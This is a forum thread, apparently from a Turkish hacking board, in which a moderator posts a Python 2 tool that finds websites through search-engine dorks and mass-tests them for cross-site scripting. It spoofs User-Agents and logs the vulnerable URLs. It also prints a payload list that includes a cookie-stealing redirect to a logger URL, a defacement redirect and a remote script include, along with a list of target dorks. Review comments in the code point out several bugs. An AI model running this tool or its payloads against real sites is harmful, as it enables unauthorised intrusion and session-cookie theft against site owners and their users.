Xss Scanner

'Tool' forumunda KaliBot tarafından 6 Mart 2016 tarihinde açılan konu

  1. KaliBot

    KaliBot Moderator

    Kod:
    #!/usr/bin/env python
    # xss scanner by pedr0 ubuntu
    # version 1.0
    ##
    
    
    
    
    # dependencies
    import re
    import hashlib
    import Queue
    from random import choice
    import threading
    import time
    import urllib2
    import sys
    import socket
    
    
    
    # script colorize output
    # NOTE(review): every colour name holds only a bare ESC byte. The rest of the
    # ANSI sequence appears to have been lost (possibly when the listing was
    # posted), so as written none of these selects a colour.
    W = R = G = O = B = "\033"


    # Pool of User-Agent strings; one is picked at random for every request.
    # The pool mixes browser and search-engine-crawler identities, so the
    # User-Agent header alone is not a reliable way to attribute this traffic.
    USER_AGENT = [
        "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3",
        "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7",
        "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
        "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
        "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)",
        "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/535.38.6 (KHTML, like Gecko) Version/5.1 Safari/535.38.6",
        "Mozilla/5.0 (Macintosh; U; U; PPC Mac OS X 10_6_7 rv:6.0; en-US) AppleWebKit/532.23.3 (KHTML, like Gecko) Version/4.0.2 Safari/532.23.3",
    ]

    # Menu choice made in main(); Crawl reads it.
    option = ' '

    # Running totals updated by the XScanClass worker threads.
    vuln = 0
    invuln = 0

    # Not referenced anywhere else in the listing shown.
    found = []
    
    
    
    
    
    
    
    ##
    # start script functions
    ##
    
    
    # Searches for dorks and grabs results
    class Crawl:
        """Collect result links for a search query and hand them to the scanner.

        Constructing an instance runs the whole workflow: ``__init__`` prompts
        for the query and page count and then calls ``crawler()``, which fetches
        the result pages, queues every link it extracts and, for menu option
        '3', runs ``XScanClass`` worker threads until the queue is drained.

        Reads the module-level ``option`` set by ``main()``.

        NOTE(review): extracted links are queued exactly as found; nothing in
        this class restricts them to a defined scope or validates them.
        """
        def __init__(self):
            """Prompt for the query and the page count, then start crawling."""
            # NOTE(review): main() only offers 1, 2, 3 and s, so this '4' branch
            # is unreachable from the menu, and self.shell is not read anywhere
            # in the listing shown.
            if option == '4':
                self.shell = str(raw_input('Shell location:'))
            self.dork = raw_input(B+'[+] Enter your dork:'+G)
            self.queue = Queue.Queue()
            # Kept as the raw input string; crawler() converts it with int().
            # The "Max 20" in the prompt is not enforced anywhere.
            self.pages = raw_input(B+'[+] How many pages (Max 20):'+G)
            # URL-quote the query so it can be placed in the search URL.
            self.qdork = urllib2.quote(self.dork)
            self.page = 1
            self.crawler()
    
    
        # Crawls Ask.com for sites and sends them to the appropriate scan.
        # The search engine is set by the URL assigned to "host" below.
        def crawler(self):
            """Fetch the result pages, queue the extracted links, then scan them.

            Requests ``self.pages`` consecutive result pages starting at
            ``self.page``; each request carries a User-Agent chosen at random
            from ``USER_AGENT``.
            """
            print (O+ '[!] Please wait while Dorking for targets...\n')
            # int() raises ValueError on non-numeric input; it is not handled.
            for i in range(int(self.pages)):
                host = "http://uk.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page)
                req = urllib2.Request(host)
                req.add_header('User-Agent', choice(USER_AGENT))
                # No timeout is passed and no exception is caught here, so a
                # failed request propagates out of the crawl.
                response = urllib2.urlopen(req)
                source = response.read()
                start = 0
                count = 1
                end = len(source)
                # Result links are located purely by these two markup fragments,
                # so the extraction depends on the exact HTML of the results page.
                numlinks = source.count('_t" href', start, end)
    
                # NOTE(review): count starts at 1 and the test is '<', so at most
                # numlinks - 1 links are taken from each page.
                while count < numlinks:
                    start = source.find('_t" href', start, end)
                    end = source.find(' onmousedown="return pk', start,  end)
                    # start+10 skips the 8-character marker plus two more
                    # characters (presumably '="'); end-1 presumably drops the
                    # closing quote. find() returning -1 is not checked.
                    # Removing "amp;" turns '&amp;' back into '&'.
                    link = source[start+10:end-1].replace("amp;","")
                    self.queue.put(link)
                    start = end
                    end = len(source)
                    count = count + 1
                self.page += 1
    
            if option == '3':
                # Ten daemon worker threads drain the shared queue.
                for i in range(10):
                    thread = XScanClass(self.queue)
                    thread.setDaemon(True)
                    thread.start()
                # Blocks until task_done() has been called once per queued link.
                self.queue.join()
    
    
    
      
    
    # scan for xss errors and output results to a file
    class XScanClass(threading.Thread):
        """Worker thread that probes queued URLs for reflected input.

        For each URL taken from the queue, the value of the last query parameter
        is replaced with a fixed marker payload, the page is requested, and the
        response body is searched for the marker word. Hits are appended to
        ``self.file``; totals are kept in the module-level ``vuln`` and
        ``invuln``.

        NOTE(review): the check is a case-insensitive substring search for
        "xssFound", so it also matches a response that echoes the payload
        HTML-encoded, i.e. safely. A hit shows that the input is reflected,
        not that script would execute.

        For anyone reading server logs: the probe is recognisable by the
        payload in ``self.xchar`` placed after the last '=' of the URL, sent
        with one of the User-Agent strings in ``USER_AGENT``.
        """
        def __init__(self, queue):
            """Store the shared work queue, the marker payload and the log path."""
            threading.Thread.__init__(self)
            self.queue = queue
            # Fixed marker payload; run() only looks for the word "xssFound".
            self.xchar = """<script>alert('xssFound')</script>"""
            # Relative path; the 'logs' directory is not created by this script.
            self.file = 'logs/xss.txt'
    
        # Checks each queued URL for reflection of the marker payload.
        def run(self):
            """Drain the queue, probing every URL that contains an '='."""
            while True:
                try:
                    # Non-blocking get: the thread ends once the queue is empty.
                    site = self.queue.get(False)
                except Queue.Empty:
                    break
                if '=' in site:
                    global vuln
                    global invuln
                    # Keep everything up to the last '=', dropping that
                    # parameter's original value.
                    xsite = site.rsplit('=', 1)[0]
                    # NOTE(review): if the URL starts with its only '=', xsite is
                    # '' and xsite[-1] raises IndexError outside the try below.
                    if xsite[-1] != "=":
                        xsite = xsite + "="
                    test = xsite + self.xchar
                    try:
                        conn = urllib2.Request(test)
                        conn.add_header('User-Agent', choice(USER_AGENT))
                        opener = urllib2.build_opener()
                        data = opener.open(conn).read()
                    # NOTE(review): the bare except hides every error, and this
                    # task_done() is followed by the unconditional one at the
                    # end of the loop body, so a failed request is counted as
                    # done twice. Queue.task_done() raises ValueError when it is
                    # called more often than items were queued, and join() can
                    # return before all links have been processed.
                    except:
                        self.queue.task_done()
                    else:
                        # Substring match only; see the class docstring.
                        if (re.findall("xssFound", data, re.I)):
                            self.xss(test)
                            vuln += 1
                        else:
                            print R+'[not vuln]'+B+' ->  '+test +''
                            invuln += 1
                else:
                    # URLs without any '=' are reported without being requested.
                    print R+'[not vuln]'+B+' ->  '+site +''
                    invuln += 1
                self.queue.task_done()
    
        # Processes a hit: prints it and appends it to the log file.
        def xss(self, url):
            """Report a hit and append it to ``self.file`` unless already logged.

            NOTE(review): several worker threads may call this at the same time
            and there is no lock around the read-then-append sequence. open()
            raises if the 'logs' directory does not exist, and that call is
            made outside any try block.
            """
            # NOTE(review): this handle is never closed, and with mode "a+" the
            # initial read position is platform-dependent, so the read may
            # return '' and the duplicate check below may never match.
            read = open(self.file, "a+").read()
            if url in read:
                print O+'[possible] ->  ' + url
            else:
                print G+"[xssFound] ->  " + url
                write = open(self.file, "a+")
                write.write('[XSS] ->  ' + url + "\n")
                write.close()   
                # Pauses this worker for two seconds after recording a new hit.
                time.sleep(2)
    
    
    
    
    
    
    # output scan results to screen
    def output():
        """Print the scan totals and terminate the script.

        Reads the module-level ``vuln`` and ``invuln`` counters and ends by
        calling ``exit()``, so control never returns to the caller.
        """
        print('\n' + O)
        print('     %s%s Vulnerable Sites Found%s' % (str(vuln), G, O))
        print('     %s%s Sites Not Vulnerable%s' % (str(invuln), R, O))
        # NOTE(review): this path is a fixed string and differs from the
        # 'logs/xss.txt' that XScanClass writes to; confirm which is intended.
        print('     Output Saved To:' + B + '[ opensource/logs/xss.txt ]\n\n' + W)
        exit()
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    # display xss injections list
    def listx():
        """Print a static reference list of example XSS test strings.

        Display only: none of these strings is sent by the scanner, which uses
        the single marker payload defined in ``XScanClass``. Most entries open
        with ``">`` to break out of a quoted attribute value, which output
        encoding of quotes and angle brackets neutralises.
        """
        examples = O+'''xss injection:
    
                 "><script>alert("xss vuln found")</script>
                 "><script>alert(document.cookie)</script>
                 "><script>alert(String.fromCharCode(88,83,83))</script>
                 "><marquee><script>alert('xss vuln found')</script></marquee>
                 "><script><center><b><h1>xss vuln found</h1></b></center></script>
                 "><script>alert(xss vuln found)<marquee><h1>xss vuln found</h1></marquee></script>
                 "></script><sc""><marquee><H1>xss vuln found</H1></marquee><br /><center><IMG src="http://db.tt/E7dH5HLR"></center></script>
                 "><script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>
                 <script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script>
                 <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('xss vuln found');\">
                 <script src=http://yoursite.com/your_files.js></script>
                 <font style='color:expression(alert(document.cookie))'>
    
                 this xss injection list is only an example, you can use another injection if you wish
                 Read more about xss here:[ http://pastebin.com/V8WVALQy ]
       '''
        print(examples)
        # Trailing empty line after the list.
        print('')
    
    
    
    
    
    # dork list
    def liste():
        """Print a static reference list of example search fragments ("dorks").

        Display only: nothing printed here is fed to ``Crawl``, which asks for
        its query interactively. Every entry is a URL pattern ending in a query
        parameter.
        """
        dork_table = O+'''List of Dorks:
    
                 search.php?id=            index.html?id=              scrapbook.php?id=         .php?searchstring=
                 search.php?q=             index.asp?q=                contentPage.php?id=       .php?author=
                 search.php?cmd=           index.html?search=          find.php?                 .php?z=
                 search.php?query=         index.php?option=           .php?txt=                 .php?mail=
                 search.php?keyword=       read.php?id=                .php?tag=                 .php?from=
                 search.php?session=       news.php?id=                .php?max=                 .php?feedback=
                 search.php?cat=           feedpost.php?id=            .php?vote=                .php?cat=
                 search.php?               feedpost.php?url=           .php?file=                .php?q=
                 index.html?q=             default.asp?catid=          .php?query=               .php?years=
                 index.asp?catid=          headersearch.php?sid=       .php?id=                  .php?pass=
    
                 this Dork list is only an example, you can use another dork if you wish
                 Read more about xss here:[ http://pastebin.com/V8WVALQy ]
       '''
        print(dork_table)
    
    
    
    
    
    
    
    
    
    
    
    ##
    # main menu
    ##
    
    def main():
        """Show the menu, read one choice and dispatch on it.

        The choice is stored in the module-level ``option``, which ``Crawl``
        also reads. The menu is redisplayed by calling ``main()`` recursively.
        """
        global option

        menu = G+'''
    
             1 - list of dorks
             2 - list of xss injections
             3 - scan for xss vuln websites
             s - exit
    '''
        print(menu)
        print(W)
        option = raw_input(R+'Chose Option:'+G)

        # Empty input: nothing is dispatched and the function simply returns.
        if not option:
            return

        if option == '1':
            liste()
        if option == '2':
            listx()
        if option == '3':
            Crawl()
            # output() ends with exit(), so the print after it is not reached.
            output()
            print(choice)

        # NOTE(review): the else below pairs only with the 's' test, so the
        # "another option" message and the menu redisplay also follow a handled
        # '1' or '2', not just an unknown choice.
        if option == 's':
            exit()
        else:
            print(B+'\n[Please chose another option]')
            time.sleep(0.9)
            main()
          
    
    
    # Start the interactive menu only when run as a script, not on import.
    if __name__ == "__main__":
        main()
     
  2. DUMBAS

    DUMBAS Yarbay

    derleyip ne diye kaydedelim ?
     
  3. karilinux

    karilinux Member
